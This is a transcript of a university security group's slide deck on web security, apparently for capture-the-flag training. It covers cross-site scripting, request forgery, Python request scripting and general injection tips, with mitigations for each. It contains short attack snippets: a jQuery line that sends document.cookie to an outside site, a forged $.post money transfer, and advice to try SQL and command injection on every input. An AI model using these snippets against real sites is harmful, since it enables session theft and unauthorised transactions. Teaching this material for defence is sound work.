Presentation is loading. Please wait.

Presentation is loading. Please wait.

WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas.

Similar presentations

Presentation on theme: "WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas."— Presentation transcript:

1 WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas

2 Cross Site Scripting

3 Overview  Exploits the trust a browser places in a site by running code (usually JS) in browser  Reflected: user is tricked into running some code  In URL: …  Pasted into address bar  Stored: the malicious code is stored persistently on the compromised website  Unfiltered comments  SQL injections allowing user control where not intended

4 Payloads and Goals  Steal cookies  Open a hidden IFRAME  Spam advertisements  Redirect to another page  Click jacking  Many more

5 Example Attack  Uses jQuery  $.get(‘‘ + document.cookie);  A get request is made to our site, which stores the parameter c in a log file, or autopwns them. Whatever.

6 Example 1 

7 Mitigation  Developers  Don’t allow users to post HTML  Keep an eye out for places where attackers could modify what other peoples’ browsers render  Users  Use NoScript or similar whitelisting plugin  Don’t click or paste a link with JavaScript in it

8 Challenge 

9 Cross Server Request Forgery

10 Overview  Similar to XSS  Exploits trust that servers place in browsers  It’s very difficult for a web server to know whether a request your computer sent it was sent with your knowledge or approval  Different than XSS, but XSS is often an attack vector for CSRF

11 Example Attack  Images  XSS $.post(‘’, {to: ‘me’, amount: 1000000});

12 Mitigation  Only trust requests from your domain  Use CSRF protection tokens – included in many web frameworks  Use the appropriate HTTP request, don’t use GET for something that modifies data  Not much to do as a user

13 Python for Web

14 Python Web Scripts  Python is a powerful scripting language.  Some web problems are very repetitious.  Using libraries urllib and urllib2.

15 Example Code  import urllib  import urllib2  url = ''  values = {'name' : 'Michael Foord',  'location' : 'Northampton',  'language' : 'Python' }  data = urllib.urlencode(values)  req = urllib2.Request(url, data)  response = urllib2.urlopen(req)  the_page =

16 Example 2 

17 Mitigation  Captchas  Lockouts after several attempts

18 Challenge 2 

19 General Tips

20 Look at Requests!  Use TamperData, Firebug, Chrome Developer Tools, Live HTTP Headers, BurpSuite, etc.  The idea is to find things we can alter  The goal is to invalidate trust that the developer put in us

21 Inject Everything  If your data goes into a database query, try SQL injection  If you think it’s piping your input into a program, try command injection via && and the like  If it looks like it’s rendering HTML, try some JavaScript

22 Questions?

Download ppt "WEB SECURITY WEEK 3 Computer Security Group University of Texas at Dallas."

Similar presentations

Ads by Google